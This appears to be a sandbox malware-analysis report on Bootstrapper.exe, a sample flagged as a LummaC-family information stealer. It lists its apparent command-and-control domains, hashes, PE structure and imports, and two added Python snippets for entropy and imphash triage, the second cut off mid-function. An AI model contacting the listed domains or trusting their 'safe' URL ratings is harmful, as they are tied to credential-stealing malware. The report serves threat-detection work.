Bootstrapper.exe | 50% | Virustotal | | Browse
Bootstrapper.exe | 39% | ReversingLabs | Win32.Exploit.LummaC |
Bootstrapper.exe | 100% | Avira | HEUR/AGEN.1312582 |
Bootstrapper.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
Source | Detection | Scanner | Label | Link
https://jubbenjusk.biz/ | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/apims | 0% | Avira URL Cloud | safe |
kickykiduz.lat | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/Li | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/api1vk | 0% | Avira URL Cloud | safe |
miniatureyu.lat | 0% | Avira URL Cloud | safe |
savorraiykj.lat | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/f | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/q | 0% | Avira URL Cloud | safe |
bloodyswif.lat | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/w | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz:443/api | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/Gsw | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/apit | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/S | 0% | Avira URL Cloud | safe |
washyceehsu.lat | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/isg8orLIezaCPJdZDugxu | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/api | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/2YmA | 0% | Avira URL Cloud | safe |
jubbenjusk.biz | 0% | Avira URL Cloud | safe |
finickypwk.lat | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/Y | 0% | Avira URL Cloud | safe |
https://jubbenjusk.biz/isg8orLIezaCPJdZDugx | 0% | Avira URL Cloud | safe |
leggelatez.lat | 0% | Avira URL Cloud | safe |
shoefeatthe.lat | 0% | Avira URL Cloud | safe |
            NameIPActiveMaliciousAntivirus DetectionReputation
            jubbenjusk.biz
            172.67.219.181
            truetrue
              unknown
IP:172.67.219.181
Domain:jubbenjusk.biz
Country:United States
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:true
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1589391
                                                    Start date and time:2025-01-12 07:09:16 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 52s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Bootstrapper.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.45, 40.126.32.76, 52.149.20.212, 172.202.163.200
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Bootstrapper.exe, PID 1036 because there are no executed functions
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time:01:10:18
Type:API Interceptor
Description:7x Sleep call for process: Bootstrapper.exe modified
Time:01:10:31
Type:API Interceptor
Description:1x Sleep call for process: WerFault.exe modified
                                                    No context
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):1.0376670003175699
                                                    Encrypted:false
                                                    SSDEEP:192:4aXjvOJ0AP3qIjsFmdzuiFKZ24IO8+rx:ZjvOqAP3qIjbzuiFKY4IO8+r
                                                    MD5:5479272BD2E51139E41A0E4582B3C05B
                                                    SHA1:821B37531EDD447ECD490F1933AD62F4DDFB2250
                                                    SHA-256:4A46E070313F60DF3A2E038C452941B19DF5CC8C311AE5B269036BEEA06A9299
                                                    SHA-512:F54D10E821C6E0096377B4387F0D57813C850EDEE5008E465CBE940B8E039B640A66018B9B61CE61D0D9E892529A983E72A3F98F7925B69C355041EE0AD48846
                                                    Malicious:true
                                                    Reputation:low
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Sun Jan 12 06:10:28 2025, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):49032
                                                    Entropy (8bit):2.5397758726529336
                                                    Encrypted:false
                                                    SSDEEP:192:NXg3XTGDGnQQjH4Op1B0/mgXSU40smQKIzDV99qUsRylz1FtT7k4h:NFDy3T/7B+mgXnsmngjsRkntvk4h
                                                    MD5:8CAAA0138C8095FF0DB1AA244842157A
                                                    SHA1:BFBC00D9D4C8C9CB6E061CECEAC841B0CDD6D227
                                                    SHA-256:042FDF787610A667E05A69BAD39744DC13F0353B7CE1FE121DBBB265D31C317E
                                                    SHA-512:CAFDACF7572B0395B5CE935BC81160CAD0F201387D313889C2EF042621BA19DB7CD87F1CAD20EB0A54520427B48C156649A041A7882FA3010E2D2790B56314A8
                                                    Malicious:false
                                                    Reputation:low
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8436
                                                    Entropy (8bit):3.6961459402610704
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJMRm67t6Y2DJSU9rgJgmfFkopDM89bQ6sfOmwm:R6lXJMA67t6YUSU9rmgmfFkcQZf1
                                                    MD5:2C0F7B1FA55BEC3B51C1CA2C8B335BFE
                                                    SHA1:B9FC00010614A843DC99B3F3FB936F05DC10C02D
                                                    SHA-256:0E0C08AA2E98BBDB8DE70D212958A8625870F7B75096808B46C5F128ED853D16
                                                    SHA-512:1F42C28D8519BECE576C17185C3CF699040DC119768ACAF5718FA782ACF455098CA75ED38DDBC5A7FA9A048F6B3893A1B7628237A2A3F44DBC7C1BF09AC2C01C
                                                    Malicious:false
                                                    Reputation:low
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):4.469268778118573
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zs6Jg77aI9WRWpW8VYHYm8M4J3/NO3FZ+q8vh/NOPCEped:uIjfII7AA7VXJVgKn8CEped
                                                    MD5:98CF3834DC8738C0767D7E3D2071F50A
                                                    SHA1:ADAE581335FEC0CAEA12C7006B3DA63A3AD4485B
                                                    SHA-256:B4281C506AD51A3A0492CC4EB53766CBBBB908C37E2263F47D21015BFBBBD03E
                                                    SHA-512:27491586B25C77CFD03849B8999B7A6C8BC819254EE253C69F5CB89234739B2DF4A9917252D913E44EAFA79251572DDA7297B204F687EB15B81642521AFE0E5A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672313" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.468582659273458
                                                    Encrypted:false
                                                    SSDEEP:6144:MzZfpi6ceLPx9skLmb0fpZWSP3aJG8nAgeiJRMMhA2zX4WABluuN7jDH5S:yZHtpZWOKnMM6bFpJj4
                                                    MD5:5F543FFF8EFD15930BD74E105005F715
                                                    SHA1:2922770E786FAD1067A97C76D73A0164F9C92CB6
                                                    SHA-256:1C57D67D2A5D371182139B8E2A7FA001528F81DF337B6D4D127A197BD00D1FAD
                                                    SHA-512:A6CF80783F0C324988A3819CC0E4CFEA851D23CF9A2A852BE5D71D08DD573AD0106AB3401D51F8EF8D975F884472ECB35C988299ABF70D3B60A43ABE3DC4EFF4
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..o..d................................................................................................................................................................................................................................................................................................................................................y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.732407581671554
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Bootstrapper.exe
                                                    File size:404'992 bytes
                                                    MD5:a9370df5fb60672577fd727e3e798e75
                                                    SHA1:a5b4a8c7caf397a3629e0156da2594de1b657776
                                                    SHA256:481a9e582ab314faa2ab950fc99ab39fc35c071bfaf45871089892129be66d55
                                                    SHA512:f72305b18065adf66f886f5e7a7b2c4a1196c2f2c881a5d7afa7dfb88aad069c0ad2ad47c814e9c193ea1b43b488c2784b1ea135ff0a012857ea28164dd5e94c
                                                    SSDEEP:6144:ux09BNmcrazYrGakdpRylUl1ScNezRTz8WAwPyZtdDy2bkd:uy9PhazGGpcUTSc4xYWAFdDyGk
                                                    TLSH:6C84AE1266FDE9D0F3B38B31EE3E8AE8662FB5665E24A65D3144671F08743A0C572703
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................Rich............PE..L......f.................4.
                                                    Icon Hash:1b6d6c6cf8f07196
                                                    Entrypoint:0x4014b7
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x661EAEC3 [Tue Apr 16 17:00:51 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:5942941c298654afc856f3a94fb00cae
                                                    Instruction
                                                    call 00007F39A8C25C64h
                                                    jmp 00007F39A8C2245Dh
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 00000328h
                                                    mov dword ptr [00449598h], eax
                                                    mov dword ptr [00449594h], ecx
                                                    mov dword ptr [00449590h], edx
                                                    mov dword ptr [0044958Ch], ebx
                                                    mov dword ptr [00449588h], esi
                                                    mov dword ptr [00449584h], edi
                                                    mov word ptr [004495B0h], ss
                                                    mov word ptr [004495A4h], cs
                                                    mov word ptr [00449580h], ds
                                                    mov word ptr [0044957Ch], es
                                                    mov word ptr [00449578h], fs
                                                    mov word ptr [00449574h], gs
                                                    pushfd
                                                    pop dword ptr [004495A8h]
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov dword ptr [0044959Ch], eax
                                                    mov eax, dword ptr [ebp+04h]
                                                    mov dword ptr [004495A0h], eax
                                                    lea eax, dword ptr [ebp+08h]
                                                    mov dword ptr [004495ACh], eax
                                                    mov eax, dword ptr [ebp-00000320h]
                                                    mov dword ptr [004494E8h], 00010001h
                                                    mov eax, dword ptr [004495A0h]
                                                    mov dword ptr [0044949Ch], eax
                                                    mov dword ptr [00449490h], C0000409h
                                                    mov dword ptr [00449494h], 00000001h
                                                    mov eax, dword ptr [00448004h]
                                                    mov dword ptr [ebp-00000328h], eax
                                                    mov eax, dword ptr [00448008h]
                                                    mov dword ptr [ebp-00000324h], eax
                                                    call dword ptr [000000A0h]
                                                    Programming Language:
                                                    • [C++] VS2008 build 21022
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x469ec | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x16fd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x45000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4324c | 0x43400 | f22a0dcad37ca8e9309869a74a6b887f | False | 0.8135999941914498 | data | 7.412788530968616 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x45000 | 0x228a | 0x2400 | 2d73c0b0ad35a17e0f8ebc7ce6645a6d | False | 0.3578559027777778 | OpenPGP Public Key Version 4 | 5.3844357292220675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x48000 | 0x67c08 | 0x1600 | 184853952973ca2e5903eac6e5f097d3 | False | 0.2878196022727273 | data | 2.9019450848196295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.joli | 0xb0000 | 0x53e5 | 0x4800 | f9debe3f07be68533bf0295e3d2ba68a | False | 0.002224392361111111 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yoli | 0xb6000 | 0x15a | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.hozuvup | 0xb7000 | 0xc | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x16fd0 | 0x17000 | a36a7cf1da239b9824903fe447501975 | False | 0.44215990149456524 | data | 5.080347280737604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
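The section table above is what drives the "PE file contains sections with non-standard names" and "Detected unpacking" signatures: the `.text` section has entropy 7.41 (near the 8.0 ceiling, typical of packed or encrypted code), and `.joli`, `.yoli` and `.hozuvup` are names no linker emits by default, two of them zero-filled on disk but writable, which is where unpacked code or data can be written at runtime. The following is an added example, not part of the Joe Sandbox report, showing how to reproduce that triage on any PE32 file with only the standard library. The input is a constructed minimal PE built in memory (helper `build_sample_pe`) so it runs offline; the `STANDARD_SECTIONS` list and the 7.0 entropy threshold are this example's own assumptions.

```python
import math
import struct

# Section characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names an MSVC-linked binary normally carries (assumption for this example); anything else gets flagged.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".didat", ".textbss"}


def shannon_entropy(buf: bytes) -> float:
    """Byte-level Shannon entropy in bits (0.0 .. 8.0), the same measure as the table's Entropy column."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(data: bytes):
    """Walk the PE section table; return per-section geometry, entropy of the on-disk bytes and triage flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]      # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]      # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                  # first IMAGE_SECTION_HEADER
    rows = []
    for i in range(nsections):
        (raw_name, vsize, va, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        entropy = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        flags = []
        if name not in STANDARD_SECTIONS:
            flags.append("non-standard name")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            flags.append("writable+executable")
        if entropy > 7.0 and chars & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
            flags.append("high-entropy code (packed/encrypted?)")
        if entropy == 0.0 and vsize:
            flags.append("zero-filled on disk (populated at runtime?)")
        rows.append({"name": name, "virtual_address": va, "virtual_size": vsize,
                     "raw_size": raw_size, "entropy": round(entropy, 4), "flags": flags})
    return rows


def build_sample_pe(sections):
    """Constructed input: assemble a minimal PE32 image (DOS header, NT headers, section table,
    raw section data) so the parser can run offline. This is not the sample analysed in the report."""
    opt_size = 0xE0
    raw_ptr = (0x40 + 24 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF   # first raw data, 0x200-aligned
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))          # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0x661EAEC3, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)   # PE32 magic; the remaining optional-header fields stay zero
    hdr += opt
    body, va = bytearray(), 0x1000
    for name, raw, chars in sections:
        raw_size = (len(raw) + 0x1FF) & ~0x1FF
        hdr += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw), va,
                           raw_size, raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        va += (len(raw) + 0xFFF) & ~0xFFF
    return bytes(hdr).ljust(raw_ptr, b"\0") + bytes(body)


# Constructed sections: maximal-entropy "code", readable strings, and a zero-filled writable oddly named section.
SAMPLE_SECTIONS = [
    (".text", bytes(range(256)) * 8, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", b"This program cannot be run in DOS mode. " * 20, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".joli", b"\0" * 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]

if __name__ == "__main__":
    for row in parse_sections(build_sample_pe(SAMPLE_SECTIONS)):
        print(f'{row["name"]:<9} VA=0x{row["virtual_address"]:x} entropy={row["entropy"]:.2f} {row["flags"]}')
```

To use it on a real file, read the bytes and pass them to `parse_sections`. Entropy is computed over the raw on-disk bytes, as in the table above, so a section whose raw size is smaller than its virtual size (the `.data` and `.joli` rows) will score low even if it is filled with decrypted code at runtime; that is the "overwrites its own PE header" / unpacking behaviour the dynamic signatures catch, not the static parser.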
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xc8b58 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4276315789473684
RT_CURSOR | 0xc8ca0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_ICON | 0xb8900 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.7505330490405118
RT_ICON | 0xb97a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.7666967509025271
RT_ICON | 0xba050 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.6705069124423964
RT_ICON | 0xba718 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.7153179190751445
RT_ICON | 0xbac80 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.7480290456431535
RT_ICON | 0xbd228 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | | | 0.8102459016393443
RT_ICON | 0xbdbb0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.8262411347517731
RT_ICON | 0xbe080 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3243603411513859
RT_ICON | 0xbef28 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.44765342960288806
RT_ICON | 0xbf7d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.5190092165898618
RT_ICON | 0xbfe98 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.536849710982659
RT_ICON | 0xc0400 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.28822701688555347
RT_ICON | 0xc14a8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.289344262295082
RT_ICON | 0xc1e30 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.34131205673758863
RT_ICON | 0xc2300 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2785181236673774
RT_ICON | 0xc31a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.36462093862815886
RT_ICON | 0xc3a50 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.3790322580645161
RT_ICON | 0xc4118 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.36921965317919075
RT_ICON | 0xc4680 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.2590248962655602
RT_ICON | 0xc6c28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.274624765478424
RT_ICON | 0xc7cd0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.28647540983606556
RT_ICON | 0xc8658 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3262411347517731
RT_STRING | 0xc9d18 | 0x59a | data | | | 0.4309623430962343
RT_STRING | 0xca2b8 | 0xfc | data | | | 0.5515873015873016
RT_STRING | 0xca3b8 | 0x788 | data | | | 0.42012448132780084
RT_STRING | 0xcab40 | 0x784 | data | | | 0.4287941787941788
RT_STRING | 0xcb2c8 | 0x726 | data | | | 0.42568306010928963
RT_STRING | 0xcb9f0 | 0x644 | data | | | 0.4389027431421446
RT_STRING | 0xcc038 | 0x6bc | data | | | 0.4274941995359629
RT_STRING | 0xcc6f8 | 0x7f2 | data | | | 0.41297935103244837
RT_STRING | 0xccef0 | 0x786 | data | | | 0.4221183800623053
RT_STRING | 0xcd678 | 0x5ce | data | | | 0.43943472409152085
RT_STRING | 0xcdc48 | 0x554 | data | | | 0.45234604105571846
RT_STRING | 0xce1a0 | 0x60c | data | | | 0.4412144702842377
RT_STRING | 0xce7b0 | 0x81c | data | | | 0.41570327552986513
RT_ACCELERATOR | 0xc8b38 | 0x20 | data | | | 1.15625
RT_GROUP_CURSOR | 0xc8c88 | 0x14 | data | | | 1.15
RT_GROUP_CURSOR | 0xc9b48 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0xbe018 | 0x68 | data | | | 0.7115384615384616
RT_GROUP_ICON | 0xc8ac0 | 0x76 | data | | | 0.6779661016949152
RT_GROUP_ICON | 0xc2298 | 0x68 | data | | | 0.7115384615384616
RT_VERSION | 0xc9b60 | 0x1b4 | data | | | 0.5825688073394495
DLL | Import
KERNEL32.dll | SearchPathW, SetThreadContext, DeleteTimerQueueEx, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, RaiseException, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, AddAtomA, FoldStringA, OpenFileMappingW, GetFileTime, FindFirstVolumeA, FindAtomW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetFilePointer, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, CloseHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetModuleHandleA
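The Import Hash shown in the static section (5942941c298654afc856f3a94fb00cae) is the imphash popularised by pefile and VirusTotal: an MD5 over the lower-cased `dll.function` pairs in import-table order, so samples repacked with the same stub but different payloads share it and can be pivoted on. The following is an added example, not part of the Joe Sandbox report or of pefile, that implements the normalisation and hash. It assumes a caller supplies `(dll, [functions])` pairs in on-disk order; `SAMPLE_IMPORTS` is a constructed subset of the KERNEL32 list above and its hash is not expected to equal the report's value, which covers the complete table.

```python
import hashlib


def normalize_imports(imports):
    """Build the canonical string imphash is computed over.

    imports: list of (dll_name, [function name | int ordinal]) in import-table order (order matters).
    Library names are lower-cased and lose a trailing .dll/.ocx/.sys; function names are lower-cased;
    ordinal imports are rendered as ordN. Assumption: pefile additionally maps known ordinals of a few
    system DLLs (e.g. ws2_32) back to names via its ordlookup table, which this example omits, so it
    matches pefile only for binaries that import by name or by ordinals of other libraries.
    """
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in (".ocx", ".sys", ".dll"):
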